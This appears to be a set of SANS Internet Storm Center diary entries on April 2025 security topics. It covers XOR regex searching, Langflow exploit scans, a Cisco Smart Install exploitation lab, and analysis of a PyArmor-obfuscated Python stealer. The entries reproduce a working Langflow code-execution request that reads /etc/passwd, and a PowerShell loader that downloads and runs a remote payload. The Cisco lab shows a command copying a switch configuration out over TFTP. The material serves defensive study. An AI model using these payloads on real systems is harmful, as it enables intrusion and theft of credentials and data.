
Published: 2025-04-14

xorsearch.py: Searching With Regexes

As promised in diary entry "XORsearch: Searching With Regexes", I will outline another method to search with xorsearch and regexes.

Instead of XORsearch.exe, the original tool that is written in C and compiled, we will use xorsearch.py, a new tool written in Python.

Unlike XORsearch.exe, xorsearch.py supports YARA rules, and thus regex searches.

Let's say we want to use this trivial regular expression to match IPv4 addresses (it matches four numbers separated by dots): \d+\.\d+\.\d+\.\d+

We can create a YARA rule for this regex:

And then we can use this rule on a test file (test-xor-1.bin):

This tells us that YARA rule ipv4 (namespace ipv4.yara) triggered on file test-xor-1.bin when it is XOR encoded with key 0x19.
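Conceptually, a key like 0x19 comes from trying every candidate key and searching the transformed data. Below is a minimal sketch of that idea for single-byte XOR only. It uses Python's re module instead of YARA, and it is not xorsearch.py's implementation (the tool supports more encodings than plain XOR). The function names are hypothetical.

```python
import re

# The trivial IPv4 regex from this diary entry, compiled as a bytes pattern.
IPV4_RE = re.compile(rb"\d+\.\d+\.\d+\.\d+")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with the same single-byte key."""
    return bytes(b ^ key for b in data)


def xor_regex_search(data: bytes, pattern: re.Pattern = IPV4_RE):
    """Try all 256 single-byte XOR keys and yield (key, match) for every hit.

    Key 0x00 is included, so matches in the unencoded data are reported too.
    """
    for key in range(256):
        decoded = xor_bytes(data, key)
        for match in pattern.finditer(decoded):
            yield key, match.group()


if __name__ == "__main__":
    # Synthetic test data: a string with an IPv4 address, XOR encoded with 0x19.
    sample = xor_bytes(b"callback to 10.0.0.1 now", 0x19)
    for key, hit in xor_regex_search(sample):
        print(f"key 0x{key:02X}: {hit!r}")
```

Brute-forcing all 256 keys is cheap for single-byte XOR. However, a loose regex like this one can also produce coincidental hits under other keys, so every reported key still needs a look at the decoded data.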

To see the YARA rule strings that were matched, use option --yarastrings:

To see the encoded file, use one of the many dump options, like -a for a HEX/ASCII dump:

Or a binary dump with option -d:
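For readers who want the same kind of view outside the tool, here is a small sketch of a classic offset / hex / ASCII dump. The layout (16 bytes per line, dots for non-printable bytes) is a common convention chosen here as an assumption. It does not necessarily match xorsearch.py's -a output byte for byte.

```python
def hex_ascii_dump(data: bytes, width: int = 16) -> str:
    """Return an offset / hex / ASCII dump of data, width bytes per line."""
    lines = []
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        hex_part = " ".join(f"{b:02X}" for b in chunk)
        # Printable ASCII is shown as-is; everything else becomes a dot.
        ascii_part = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in chunk)
        # Pad the hex column so the ASCII column lines up on short last lines.
        lines.append(f"{offset:08X}: {hex_part:<{width * 3 - 1}}  {ascii_part}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(hex_ascii_dump(b"callback to 10.0.0.1 now\x00\x01"))
```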

If you find it cumbersome to create a YARA rule just for a simple regex (I find it cumbersome :-) ), you can pass the regex via the command line prefixed with #r#, and xorsearch.py will generate the YARA rule for you:
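The wrapping step itself is simple. This sketch (hypothetical helper name) shows one way to turn a regex into a minimal YARA rule. The exact rule text that xorsearch.py generates for #r# is not shown in this entry, so the rule layout and the string name $re are assumptions.

```python
def regex_to_yara(regex: str, rule_name: str = "regex") -> str:
    """Wrap a regular expression in a minimal YARA rule (hypothetical helper)."""
    # YARA delimits regular expressions with forward slashes, so escape every
    # slash in the pattern (this sketch assumes none are already escaped).
    escaped = regex.replace("/", r"\/")
    return (
        f"rule {rule_name}\n"
        "{\n"
        "    strings:\n"
        f"        $re = /{escaped}/\n"
        "    condition:\n"
        "        $re\n"
        "}\n"
    )


if __name__ == "__main__":
    print(regex_to_yara(r"\d+\.\d+\.\d+\.\d+", "ipv4"))
```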

I will give more examples of this in an upcoming diary entry.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

 


Published: 2025-04-12

Exploit Attempts for Recent Langflow AI Vulnerability (CVE-2025-3248)

Two weeks ago, version 1.3.0 of Langflow was released. The release notes list many fixes but do not mention that one of the "Bug Fixes" addresses a major vulnerability. Instead, the release notes state, "auth current user on code validation." [1]

Its website states, "Langflow is a low-code tool for developers that makes it easier to build powerful AI agents and workflows that can use any API, model, or database." It can be installed as a Python package, a standalone desktop application, or as a cloud-hosted service. DataStax provides a ready-built cloud-hosted environment for Langflow.

The vulnerability went somewhat unnoticed, at least by me, until Horizon3 created a detailed writeup showing how easy it is to exploit and provided a proof-of-concept exploit. Horizon3 published its blog on April 9th [2]. We saw the first hit to the vulnerable URL, "/api/v1/validate/code", on April 10th. Today (April 12th), we saw a significant increase in hits for this URL.

The requests we are seeing are vulnerability scans. They attempt to retrieve the content of "/etc/passwd" to verify whether the target system is vulnerable:

POST /api/v1/validate/code HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4
Connection: close
Content-Length: 125
Content-Type: application/json
Accept-Encoding: gzip

 

{"code": "@exec('raise Exception(__import__(\\"subprocess\\").check_output([\\"cat\\", \\"/etc/passwd\\"]))')\\ndef foo():\\n  pass"}
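The payload relies on a Python detail: decorator expressions are evaluated when a def statement executes, not when the function is called. The Horizon3 write-up [2] describes the endpoint executing submitted function definitions as part of "validating" them. Below is a simplified, hypothetical re-creation of that pattern. The name validate_like_langflow is invented and this is not Langflow's code. A harmless payload replaces cat /etc/passwd.

```python
import ast


def validate_like_langflow(code: str) -> list:
    """Hypothetical, simplified re-creation of the vulnerable pattern.

    Parse the submitted code and execute each top-level function definition
    to "validate" it. Executing a def statement also evaluates its decorator
    expressions, so code placed in a decorator runs immediately.
    """
    errors = []
    for node in ast.parse(code).body:
        if isinstance(node, ast.FunctionDef):
            module = ast.Module(body=[node], type_ignores=[])
            try:
                exec(compile(module, "<validate>", "exec"), {})
            except Exception as exc:  # error text is collected and returned
                errors.append(str(exc))
    return errors


# Harmless stand-in for the scanner payload: instead of running
# "cat /etc/passwd", the decorator raises an exception carrying 6*7.
payload = "@exec('raise Exception(str(6*7))')\ndef foo():\n  pass"
print(validate_like_langflow(payload))  # ['42']
```

Because the exception text ends up in the validation errors, wrapping the command output in an Exception is presumably how the scanner gets the content of /etc/passwd back in the response.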
 

Not all of our honeypots report request bodies, and this is the only request body we have recorded so far. To date, all of the requests originate from TOR exit nodes.

 

[1] https://github.com/langflow-ai/langflow/releases/tag/1.3.0
[2] https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter


Published: 2025-04-09

Network Infraxploit [Guest Diary]

[This is a Guest Diary by Matthew Gorman, an ISC intern as part of the SANS.edu BACS program]

Background

I recently had the opportunity to get hands-on with some Cisco networking devices. Having worked as a network engineer before my current job as a network forensics analyst, I have a relatively solid understanding of these infrastructure devices and how they work. I wanted to write this blog post detailing some of the critical oversights I see in my current job that are common for these devices, and how they are abused by attackers who are also familiar with how they work. To demonstrate this, I will walk through a vulnerability in these network infrastructure devices that was first discovered in 2018: CVE-2018-0171, a Remote Code Execution exploit targeting Cisco’s Smart Install feature. 

CVE-2018-0171

Cisco’s Smart Install feature is a “plug and play”[1] configuration feature that allows new networking devices to be deployed remotely: when plugged in, they configure themselves automatically without needing the support of a network administrator. This greatly eases the burden on network administrators, who would otherwise need to go on site to make the basic initial configuration changes that ensure the device is remotely accessible. 

The problem with Smart Install is three-pronged. First, this feature is enabled by default on Cisco devices.[2] Second, by design, the Smart Install protocol does not require authentication prior to use. Third, because these devices facilitate the flow of network traffic in and out of organizations, the port is often publicly accessible. In fact, a cursory search on Censys for this port (TCP 4786) and the service name associated with Cisco Smart Install (SMI) pulled up 1,239 devices with this service publicly accessible.

To be clear, this is not to say that all 1,239 of these devices are vulnerable to this particular CVE. This is simply illustrating the prevalence of publicly accessible devices running the Smart Install service.

So when Cisco published a critical vulnerability with remote code execution capabilities in 2018, impacting a service that is designed to be open to the internet, it quickly became a popular exploit. The flaw in the Smart Install service allows an attacker to craft a packet containing a Smart Install message that is improperly validated, allowing the supplied command to run without authentication.

To gain additional analytical insight into this attack, I got hands-on with some outdated Cisco devices and pulled down an open-source tool that targets this vulnerability, the Smart Install Exploit Tool (SIET)[3].

SIET Script Analysis

For this use case, I used a Cisco Catalyst 3750 switch running IOS 12.2(55)SE11. Using the Cisco Software Checker tool[4], I identified 32 known vulnerabilities in this IOS version, including 3 rated “Critical”. One of those “Critical” vulnerabilities was CVE-2018-0171. After confirming the switch was vulnerable to CVE-2018-0171, I downloaded the SIET tool from GitHub to examine how it works. The Python script that the Smart Install Exploit Tool (v3) is built on has several functions that perform different actions against the targeted device. These functions include:

conn_with_client
This sets up a connection with the remote Cisco device and prints different messages depending on the targeted device's response.

test_device
This creates a malicious Smart Install packet and calls the conn_with_client function to send it to the remote device.

change_tftp
This function calls the conn_with_client function to connect to the targeted Cisco device and performs different actions depending on the mode the Threat Actor (TA) selects. The available modes allow the actor to upload their own altered configuration file to replace the existing configuration file on the targeted device (or on multiple devices, if specified), use TFTP to transfer the existing configuration file to the TA’s IP address, or have the targeted device download a potentially malicious or trojanized Cisco IOS image file from the TA’s IP address. 

In summary, this exploit tool provides significant capability to a Threat Actor seeking to gain access to an unpatched Cisco networking device running the Smart Install service.

Packet Analysis

After setting up the connection from my laptop to the Cisco 3750 switch, I enabled the Smart Install service on the switch by issuing the command “vstack”. The service is enabled by default but, in this case, had been turned off during previous testing. Issuing this command starts a TCP listener on port 4786, which Smart Install uses to respond to Smart Install Director requests. A Smart Install Director is a role in the Cisco Smart Install architecture that acts as a central management hub for all Smart Install-enabled clients; in this case, the client is the Cisco 3750 switch.
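To check your own devices for an exposed Smart Install listener, a plain TCP connect test against port 4786 is enough. The sketch below uses a hypothetical function name and sends no Smart Install messages, so an open port says nothing about the IOS version or patch level. On devices where the feature is not needed, the “no vstack” command disables it and closes the listener.

```python
import socket


def smart_install_port_open(host: str, port: int = 4786, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds.

    Only shows that something is listening on the Smart Install port; it does
    not speak the Smart Install protocol or test for CVE-2018-0171.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, or timed out
        return False


if __name__ == "__main__":
    # 192.0.2.10 is a documentation address; replace it with a device you own.
    print(smart_install_port_open("192.0.2.10"))
```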

Once the switch was configured, I fired up SIETv3 and ran the script with the “-h” flag to pull up the help menu. 

As seen above, this tool has several options that can be run against vulnerable Cisco networking devices. The one I used in this scenario was the “-g” flag, which pulls back the configuration of the device. Before running the command, I started Wireshark to make sure I captured the attack at the packet level. 

After running the attack and successfully pulling back the configuration of the Cisco 3750 I stopped the packet capture. Below is a snippet from the packet capture that shows the structure of the attack from a high level. 

Generally, the attack I specified follows a pattern of connecting to the Smart Install port (4786) and then using the Trivial File Transfer Protocol (TFTP) to grab the contents of the Cisco switch's running configuration. 

Interestingly, among the TCP packets communicating on port 4786, there is a single packet that is much larger than the others. In this packet capture, it is packet 43, with a length of 1102 bytes. 

Examining the data portion of this packet reveals some interesting commands being issued from my laptop to the 3750. Specifically, my laptop uses the Smart Install port to first issue the command “copy system:running-config flash:/config.text”. This command takes the running configuration file that exists in the system directory and copies it to the flash directory with the name “config.text”. SIET then follows up with a second command, “copy flash:/config.text tftp://192.168.10.2/192.168.10.1.conf”, which takes the newly copied config.text file and, using TFTP, copies it to my laptop under the new name “192.168.10.1.conf”. 
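If you export the bytes of a packet like number 43 (for example with Wireshark's File -> Export Packet Bytes), a short script can pull the commands out. This sketch assumes the commands travel as plain printable ASCII separated by non-printable padding, as the capture suggests. The function name is hypothetical, and the test payload is synthetic rather than taken from the real capture.

```python
import re

# A "copy ..." command followed by printable ASCII, ending at the first
# non-printable byte (assumption: commands are NUL-padded ASCII strings).
COPY_CMD_RE = re.compile(rb"copy [\x20-\x7e]+")


def extract_ios_copy_commands(payload: bytes) -> list:
    """Return IOS 'copy ...' command strings found in a raw TCP payload."""
    return [m.group().decode("ascii").strip() for m in COPY_CMD_RE.finditer(payload)]


if __name__ == "__main__":
    with open("packet43.bin", "rb") as f:  # hypothetical exported packet bytes
        for cmd in extract_ios_copy_commands(f.read()):
            print(cmd)
```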

After these two commands, the TFTP file transfer begins, and because TFTP is a cleartext protocol, the entire running configuration of the 3750 is visible in the data portion of the TFTP packets. Below is the data portion of packet 66, which shows part of the configuration in clear text.

Running-Configuration Analysis

Examining the transferred file only through the data portion of these TFTP packets in Wireshark makes it a little hard to parse. Luckily, Wireshark includes a file carving feature that reassembles the entire transferred file, making it easier to read.

To do so, I used the TFTP option under “File -> Export Objects -> TFTP…”. This pulls up the window below, which displays the last packet of the file transfer, the size of the transfer, and the name of the file as specified in the second command issued in packet 43. 
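Under the hood, this kind of carving relies on the simple TFTP packet format from RFC 1350. A DATA packet is a 2-byte opcode (3), a 2-byte block number, and up to 512 bytes of data, and a shorter final block ends the transfer. Below is a minimal sketch of reassembling one transfer from its UDP payloads. It is not Wireshark's implementation, and the function names are hypothetical.

```python
import struct

TFTP_DATA = 3  # RFC 1350 opcode for DATA packets (opcode 4 is ACK)


def parse_tftp_data(udp_payload: bytes):
    """Return (block_number, data) for a TFTP DATA packet, else None."""
    if len(udp_payload) < 4:
        return None
    opcode, block = struct.unpack("!HH", udp_payload[:4])
    if opcode != TFTP_DATA:
        return None
    return block, udp_payload[4:]


def reassemble_tftp(udp_payloads) -> bytes:
    """Rebuild one transferred file from the UDP payloads of a TFTP session.

    Assumes a single transfer with fewer than 65,536 blocks (no block-number
    wraparound); a retransmitted block simply overwrites the earlier copy.
    """
    blocks = {}
    for payload in udp_payloads:
        parsed = parse_tftp_data(payload)
        if parsed is not None:
            block, data = parsed
            blocks[block] = data
    return b"".join(blocks[n] for n in sorted(blocks))
```

Keying blocks by number rather than by arrival order tolerates out-of-order delivery and retransmissions, which both occur on real networks.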

From here I saved off the file and pulled it up in a text editor to examine the whole running configuration file that was transferred. Below is a screenshot of the first several lines of the running configuration. A quick note, I did edit the text file to censor the passwords used on this device (denoted by “<CENSORED>”) for privacy and security reasons. 

With this information in hand, a Threat Actor (TA) could examine the running configuration to probe for additional weaknesses to exploit further. For example, in this case I have several Type 7 passwords configured on this switch, denoted by “password 7”. Type 7 passwords are passwords that have been encrypted using a Vigenère cipher. Unfortunately, the key for this cipher has been public for many years, and as a result there are several websites, GitHub tools, and tools built into offensive platforms such as Kali Linux that can crack these passwords immediately. For this reason, the NSA strongly recommends against using type 7 passwords in any form[5]. 
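To make "crack these passwords immediately" concrete, here is a minimal decoder sketch. It assumes the widely published type 7 key string and the usual encoding layout: two decimal digits give the starting offset into the key, and the remaining hex pairs are bytes XORed with the repeating key. The function name is hypothetical. The test vector 094F471A1A0A decodes to "cisco".

```python
# Widely published key string used by Cisco type 7 password encoding.
XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encoded: str) -> str:
    """Reverse a Cisco type 7 password string (no secret key needed)."""
    seed = int(encoded[:2])               # starting offset into XLAT
    cipher = bytes.fromhex(encoded[2:])   # remaining hex pairs are the bytes
    return "".join(
        chr(b ^ ord(XLAT[(seed + i) % len(XLAT)]))
        for i, b in enumerate(cipher)
    )


if __name__ == "__main__":
    print(decode_type7("094F471A1A0A"))
```

Since the only "secret" is a constant key built into every implementation, type 7 is an encoding rather than protection.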

In this case, the 3750 does have type 7 passwords configured for the local accounts with admin privileges (admin accounts are distinguished by “privilege 15”, the highest privilege level on a Cisco device), and with the unedited version of this running configuration, a TA could easily crack the passwords for these accounts. Should the SSH configuration for this device be equally insecure, for example lacking an Access Control List, a Threat Actor could log in with the newly cracked credentials using a legitimate account that was provisioned for use by the device's owners. This would limit the detectable footprint of the TA’s activity, because they would not need to create a new account on the device that might stand out to an organization closely monitoring account creation on its network devices.
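Defenders can look for the same weakness in their own exported configurations. The sketch below (hypothetical helper, synthetic sample config) lists every line that stores a type 7 password and flags lines that also grant privilege 15. It is a simple line-based heuristic, not a full IOS configuration parser.

```python
import re

TYPE7_RE = re.compile(r"\bpassword 7 (\S+)")
USER_RE = re.compile(r"^username (\S+)")
PRIV_RE = re.compile(r"\bprivilege (\d+)\b")


def audit_type7(config: str) -> list:
    """List config lines that store type 7 passwords, flagging privilege 15."""
    findings = []
    for lineno, line in enumerate(config.splitlines(), start=1):
        text = line.strip()  # sub-mode lines such as " password 7 ..." are indented
        if not TYPE7_RE.search(text):
            continue
        user = USER_RE.match(text)
        priv = PRIV_RE.search(text)
        findings.append({
            "line": lineno,
            "username": user.group(1) if user else None,
            "privilege": int(priv.group(1)) if priv else None,
            "admin": bool(priv) and int(priv.group(1)) == 15,
        })
    return findings


if __name__ == "__main__":
    sample = "username admin privilege 15 password 7 094F471A1A0A\nline vty 0 4\n password 7 094F471A1A0A\n"
    for finding in audit_type7(sample):
        print(finding)
```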

Conclusion

It is an unfortunate reality that while this particular vulnerability may be the age of the average American second grader[6] (reaching 7 years old by March 28, 2025), it is still actively being exploited with incredible degrees of success. GreyNoise, a cyber threat intelligence company, and Cisco Talos, Cisco’s threat intelligence arm, have both published blog posts on the active use of CVE-2018-0171 by the TA known as Salt Typhoon.[7][8] Salt Typhoon is an Advanced Persistent Threat (APT) actor based in the People’s Republic of China and was recently reported to be behind a campaign of attacks that gained media attention in the fall of 2024. These attacks, described by one U.S. Senator as the “worst telecom hack in our nation’s history”, targeted several major US-based Internet Service Providers that operate globally, including Verizon, AT&T, and T-Mobile.[9] While the impact of these hacks is still being understood today, what we do know is that there are significant security gaps in the monitoring and management of the network infrastructure devices that stitch together the internet. These devices will continue to be a lucrative target for APTs, cybercriminals, and others who wish to gain a foothold in critical infrastructure. Unless organizations begin prioritizing the hardening and visibility of their network infrastructure, vulnerabilities like CVE-2018-0171 will remain open doors for adversaries.

[1] https://www.cisco.com/c/en/us/td/docs/switches/lan/smart_install/configuration/guide/smart_install/concepts.html
[2] https://www.nsa.gov/portals/75/documents/what-we-do/cybersecurity/professional-resources/orn-cisco-smart-install.pdf
[3] https://github.com/frostbits-security/SIET
[4] https://sec.cloudapps.cisco.com/security/center/softwarechecker.x
[5] https://media.defense.gov/2022/Feb/17/2002940795/-1/-1/1/CSI_CISCO_PASSWORD_TYPES_BEST_PRACTICES_20220217.PDF
[6] https://www.cde.state.co.us/datapipeline/grade-age-chart
[7] https://www.greynoise.io/blog/greynoise-observes-active-exploitation-of-cisco-vulnerabilities-tied-to-salt-typhoon-attacks
[8] https://blog.talosintelligence.com/salt-typhoon-analysis/
[9] https://www.washingtonpost.com/national-security/2024/11/21/salt-typhoon-china-hack-telecom/
[10] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Published: 2025-04-09

Obfuscated Malicious Python Scripts with PyArmor

Obfuscation is very important for many developers. They may protect their code for multiple reasons, like copyright, anti-cheat (games), or to prevent their code from being reused. While an obfuscated program is not automatically malicious, obfuscation is often a good indicator. For malware developers, obfuscation helps bypass many static security controls and slows down the reverse-engineering process.

There are two main ways to obfuscate your code: directly at development time (string obfuscation, code pollution, renamed functions and variables, …) or through a separate tool that takes the original program as input and generates a brand new one.

Yesterday, I spotted some malicious Python scripts that were protected using the same technique: PyArmor[1]. This tool does not come from the underground; it is a legitimate tool designed to deeply obfuscate Python scripts, and it does a pretty decent job!

Let’s have a look at one of them delivered through a piece of JavaScript: update.js (SHA256: 64bcf9eb0a54230372438a09ba0ac9e5fa753622e88713d80b9298ab219540fa[2]). The script is a one-liner:

var WshShell = new ActiveXObject("Wscript.Shell");
WshShell.run("Powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded WwBTAHkAcwB0AGUA ...[Redacted] ... 8ACAAaQBlAHgA", 0, false);

The decoded Base64 data reveals another one:

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"JFVSTCA9ICdo ... [Redacted] ... 2NyaXB0UGF0aCINCg=="}' | ConvertFrom-Json).Script)) | iex
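Both Base64 layers can be peeled off offline. The -Encoded argument (PowerShell accepts it as an abbreviation of -EncodedCommand) carries Base64 over UTF-16LE text. The Script field of the JSON object above carries Base64 over UTF-8 text, matching the [System.Text.Encoding]::UTF8 call. The helper names below are hypothetical.

```python
import base64
import json


def decode_powershell_encoded(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand value (Base64 of UTF-16LE text)."""
    return base64.b64decode(b64).decode("utf-16-le")


def decode_json_script(json_text: str) -> str:
    """Decode the Base64 'Script' field of a JSON blob (UTF-8 text)."""
    return base64.b64decode(json.loads(json_text)["Script"]).decode("utf-8")


if __name__ == "__main__":
    print(decode_powershell_encoded("aQBlAHgA"))
```

Decoding this way only transforms text and never executes it, which is what you want when handling a live sample.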

Did you see that the next payload is stored in a JSON object?  Here is the decoded script:

$URL = 'hxxps://postprocesser[.]com/.well-known/pki-validation/go/python3.zip'
$OutFile = Join-Path $env:TEMP 'py.zip'
$ExtractPath = $env:TEMP
$pythonExe = 'pythonw.exe'
$scriptPy = 'exec.py'

$ProgressPreference = 'SilentlyContinue'
Invoke-WebRequest -Uri $URL -OutFile $OutFile

if (Test-Path -Path (Join-Path $ExtractPath 'python3')) {
    Remove-Item -Path (Join-Path $ExtractPath 'python3') -Recurse -Force
}

Add-Type -AssemblyName System.IO.Compression.FileSystem
[System.IO.Compression.ZipFile]::ExtractToDirectory($OutFile, $ExtractPath)

$pythonPath = Join-Path (Join-Path $ExtractPath 'python3') $pythonExe
$scriptPath = Join-Path (Join-Path $ExtractPath 'python3') $scriptPy

Start-Process -NoNewWindow -FilePath "cmd.exe" -ArgumentList "/c set REALTEKAUDIO=hxxps://postprocesser[.]com/.well-known/pki-validation/go/cinnamonroll.php?id=mumu && set PROCNAME=Main && $pythonPath $scriptPath"

The downloaded archive python3.zip contains a stand-alone Python environment and also the next payload (exec.py):

# Pyarmor 8.5.11 (pro), 005724, non-profits, 2024-12-13T07:33:37.517122
from pyarmor_runtime_005724 import __pyarmor__
__pyarmor__(__name__, __file__, b'PY005724\x00\x03\x0b\x00\xa7\r\r\n\x80 ... [Redacted] ... \xff\xe3m\x82\xdboi,\x85i\xf0')
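Stubs like this one are easy to spot when hunting through extracted archives such as python3.zip. The heuristic sketch below flags a script that carries the PyArmor header comment or imports __pyarmor__ from a pyarmor_runtime_* package. It only identifies the stub and does not deobfuscate anything. Calling the "(pro)" field an edition is an assumption.

```python
import re

# Header comment seen in the sample, e.g. "# Pyarmor 8.5.11 (pro), 005724, ..."
HEADER_RE = re.compile(r"#\s*Pyarmor\s+(\d+(?:\.\d+)*)\s+\((\w+)\)", re.IGNORECASE)
# Import of the runtime package, e.g. "from pyarmor_runtime_005724 import __pyarmor__"
RUNTIME_RE = re.compile(r"from\s+(pyarmor_runtime_\d+)\s+import\s+__pyarmor__")


def triage_pyarmor(source: str) -> dict:
    """Heuristically flag a script as a PyArmor-protected stub."""
    header = HEADER_RE.search(source)
    runtime = RUNTIME_RE.search(source)
    return {
        "is_pyarmor": runtime is not None or header is not None,
        "version": header.group(1) if header else None,
        "edition": header.group(2) if header else None,
        "runtime_package": runtime.group(1) if runtime else None,
    }
```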

If you execute this code in a sandbox, it will perform many suspicious actions:

wmic path win32_VideoController get name
wmic csproduct get UUID
taskkill /F /IM msedge.exe
taskkill /F /IM chrome.exe

Then crash…

How can we get more details about this Python script? PyArmor-protected code can’t be deobfuscated easily (especially with the latest version). Let’s try to extract some pieces of memory. As described in the PyArmor documentation[3], it serializes code objects and obfuscates them to protect constants and literal strings. Python marshal[4] is used for this.
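For reference, here is what an ordinary marshal round trip of a code object looks like, and how to check whether a dumped buffer is one. Note that on Python 3.7+ a .pyc file starts with a 16-byte header before the marshal data. A raw buffer dumped from PyMarshal_ReadObjectFromString() is therefore not a loadable .pyc even when it holds a plain code object, and marshal.loads() is the direct test. If PyArmor has obfuscated the serialized data, as its documentation [3] describes, such a check would be expected to fail. The helper names are hypothetical.

```python
import marshal
import types


def try_load_code(blob: bytes):
    """Return a code object if blob is a plain marshal stream of one, else None."""
    try:
        obj = marshal.loads(blob)
    except (EOFError, ValueError, TypeError):
        return None
    return obj if isinstance(obj, types.CodeType) else None


def string_constants(code: types.CodeType):
    """Yield string constants from a code object and its nested code objects."""
    for const in code.co_consts:
        if isinstance(const, str):
            yield const
        elif isinstance(const, types.CodeType):
            yield from string_constants(const)


# Round trip: compile -> marshal.dumps -> marshal.loads.
demo = compile("def f():\n    return 'inner'\nx = 'outer'\n", "<demo>", "exec")
blob = marshal.dumps(demo)
print(sorted(set(string_constants(try_load_code(blob))) & {"inner", "outer"}))  # ['inner', 'outer']
```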

Using Frida[5], let’s try to access some memory regions. We can hook PyMarshal_ReadObjectFromString() and dump the data it receives to disk. Here is a quick Frida script:

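// Hook CPython's C API function PyMarshal_ReadObjectFromString(const char *data, Py_ssize_t len)
// and save every buffer it is asked to deserialize (Frida 16.x API, as used in the run below).
const marshalLoads = Module.findExportByName(null, "PyMarshal_ReadObjectFromString");
if (marshalLoads !== null) {
    console.log("Found marshal.loads at: " + marshalLoads);
    Interceptor.attach(marshalLoads, {
        onEnter: function (args) {
            // Remember the input buffer and its length for onLeave
            this.buf = args[0];
            this.len = args[1].toInt32();
        },
        onLeave: function (retval) {
            // Copy the raw serialized bytes; the file holds marshal data only,
            // without the header a real .pyc file would have
            const raw = Memory.readByteArray(this.buf, this.len);
            const filename = `marshal_dump_${Date.now()}.pyc`;
            const f = new File(filename, "wb");
            f.write(raw);
            f.close();
            console.log("[+] Dumped marshal.loads payload to: " + filename);
        }
    });
} else {
    console.log("marshal.loads not found.");
}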

Let’s execute the script again through Frida:

 

C:\Users\REM\AppData\Local\Temp\python3>frida -l .\hook.js -f .\python.exe exec.py
     ____
    / _  |   Frida 16.7.4 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to Local System (id=local)
Spawning `.\python.exe exec.py`...
Found marshal.loads at: 0x7ffbceb68fc8
Spawned `.\python.exe exec.py`. Resuming main thread!
[+] Dumped marshal.loads payload to: marshal_dump_1744177893798.pyc
...

We had a hit on the hooked function! However, the resulting file is not Python bytecode as expected, just data without relevant strings (only strings related to the Python environment).

Another approach is to dump the complete process memory and then search for strings again (once in memory, the code has been deobfuscated).
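Once a memory dump exists (produced with any process-dumping tool), the search itself works like the classic strings utility. This minimal Python equivalent reports runs of printable ASCII and of UTF-16LE text. The minimum length of 6 is an arbitrary choice, and the function name is hypothetical.

```python
import re


def extract_strings(data: bytes, min_len: int = 6):
    """Yield (offset, text) for printable ASCII and UTF-16LE runs in data."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in ascii_re.finditer(data):
        yield m.start(), m.group().decode("ascii")
    for m in utf16_re.finditer(data):
        yield m.start(), m.group().decode("utf-16-le")


if __name__ == "__main__":
    with open("python.dmp", "rb") as f:  # hypothetical dump file name
        for offset, text in extract_strings(f.read()):
            print(f"{offset:#010x} {text}")
```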

Interesting strings are present in memory and reveal a classic Python script:

esurroundtogethertomorrowtortoisetransferumbrellauniverseDwmFlushAbortDocDeleteDCMoveToExResetDCWoleaut32SetFocusCopyRectPtInRectDrawIconFillRectEndPaintClassANYQuestiondaylightSHA1-RSADSA-SHA1DNS nameavx512cdavx512eravx512pfavx512dq2.5.4.102.5.4.112.5.4.17FakeErrorfork/execcontinuedRemoveAll#execwaitinterruptbus errorntdll.dllFindCloseLocalFreeMoveFileWWriteFileWSASendTowiresharkprl_toolsprocmon64exeinfopeproxifierhttpdebugmitmproxytitanhideSERVER-PCLOUISE-PCBECKER-PCkEecfMwgjralphs-pcGANGISTANRALPHS-PCj6SHA37KAkeecfmwgjQmIS5df7upWOuqdTDQUox1tzaMOrB5BnfuR2txWas1m2ta.monaldoUser DataMicrosoft%s//UsersPasswordsDownloadsAutofillsBitFinityDoge LabsLiqualityMaiarDEFI\bytecoinnot foundopera.exebrave.exeDCBrowserSeaMonkeyIceDragonPale MoonUrBrowsermotdepassDocumentsTLauncheralts.jsonalts.novoLightcord

You can see some sandbox hostnames (“SERVER-PC”, “LOUISE-PC”, …) as well as analysis tool process names (“procmon64”, “exeinfope”, …).

Another interesting one:

failed to write to key log

Credit cards and wallet activity:

Credit Cards: %-50s %-50s %-50s\Electrum\walletsbrowser not foundEpicGamesLauncher

It seems to be a classic stealer...

If you have tools or processes to deobfuscate PyArmor-protected scripts, please share!

[1] https://github.com/dashingsoft/pyarmor
[2] https://www.virustotal.com/gui/file/64bcf9eb0a54230372438a09ba0ac9e5fa753622e88713d80b9298ab219540fa/details
[3] https://pyarmor.readthedocs.io/en/v7.3.3/how-to-do.html
[4] https://docs.python.org/3/library/marshal.html
[5] https://frida.re

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key


Published: 2025-04-08

Microsoft April 2025 Patch Tuesday

This month, Microsoft has released patches addressing a total of 125 vulnerabilities. Among these, 11 are classified as critical, highlighting the potential for significant impact if exploited. Notably, one vulnerability is currently being exploited in the wild, underscoring the importance of timely updates. While no vulnerabilities were disclosed prior to this patch release, the comprehensive updates aim to fortify systems against a range of threats, including remote code execution and privilege escalation. Users are encouraged to apply these patches promptly to enhance their security posture.

Windows Common Log File System Driver Elevation of Privilege Vulnerability (CVE-2025-29824)
